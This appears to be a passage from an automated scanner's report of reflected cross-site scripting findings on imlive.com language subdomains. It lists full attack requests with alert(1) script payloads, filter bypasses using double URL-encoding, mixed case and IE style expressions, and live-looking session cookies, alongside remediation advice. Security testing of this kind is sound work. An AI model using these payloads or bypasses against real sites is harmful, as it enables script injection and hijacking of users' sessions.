This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=e12af"><script>alert(1)</script>f4d60ab8f81&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee4f7"><script>alert(1)</script>0f4356d3bc3 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=ee4f7"><script>alert(1)</script>0f4356d3bc3&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d was submitted in the gotopage parameter. This input was echoed as db58b'onerror='alert(1)'44c9eed88d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=db58b%2527onerror%253d%2527alert%25281%2529%252744c9eed88d HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:08 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ide=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSTRTBSD=CEBIMIMAOCCIFKMLDLMBDPAK; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:08 GMT Connection: close Content-Length: 8303 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8f5f"><script>alert(1)</script>74d0037b57 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.27. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dk.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31330"><script>alert(1)</script>1979371c19a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?31330"><script>alert(1)</script>1979371c19a=1 HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||31330"><script>alert(1)</script>1979371c19a~1');return false;"> ...[SNIP]...
2.28. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dk.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669d4'-alert(1)-'409ace51e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?669d4'-alert(1)-'409ace51e58=1 HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39b96"><script>alert(1)</script>aa918e4b7e3 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d099c"><script>alert(1)</script>1462ebc3ff2 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 was submitted in the gotopage parameter. This input was echoed as 2babb'style='x:expression(alert(1))'730ccb26132 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: idk=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQSTSCRD=JCBCPJMAPKIPKJHFCJIAJBAC; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:16 GMT Connection: close Content-Length: 8330 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c286"><script>alert(1)</script>f1e7aab618f was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.33. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f845"><script>alert(1)</script>2a1f57da1a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?8f845"><script>alert(1)</script>2a1f57da1a5=1 HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||8f845"><script>alert(1)</script>2a1f57da1a5~1');return false;"> ...[SNIP]...
2.34. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://es.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ff3'-alert(1)-'a75b4d32011 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?86ff3'-alert(1)-'a75b4d32011=1 HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52d7"><script>alert(1)</script>569b58da610 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd0ed"><script>alert(1)</script>3940b74ef04 was submitted in the from parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25492'onerror%3d'alert(1)'4929c58198 was submitted in the gotopage parameter. This input was echoed as 25492'onerror='alert(1)'4929c58198 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/25492'onerror%3d'alert(1)'4929c58198 HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSRTQCRC=GFLJMIMAIHNDHDFGKCOMPNDP; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:17 GMT Connection: close Content-Length: 8313 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb36"><script>alert(1)</script>678c2c2a5a9 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;"> ...[SNIP]...
2.39. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b566'-alert(1)-'c7449b1e1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?4b566'-alert(1)-'c7449b1e1ba=1 HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/?4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&iy=dallas&id=44&iu=1&vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
2.40. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://fr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647=1 HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17fa1'onerror%3d'alert(1)'4373c72317b was submitted in the gotopage parameter. This input was echoed as 17fa1'onerror='alert(1)'4373c72317b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/17fa1'onerror%3d'alert(1)'4373c72317b HTTP/1.1 Host: fr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:22 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQQRCSC=BMMFJIMAJCKNADIOHDLHHPAA; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:22 GMT Connection: close Content-Length: 8315 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
2.42. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://gr.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ff7"><script>alert(1)</script>e0815795bf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?84ff7"><script>alert(1)</script>e0815795bf3=1 HTTP/1.1 Host: gr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
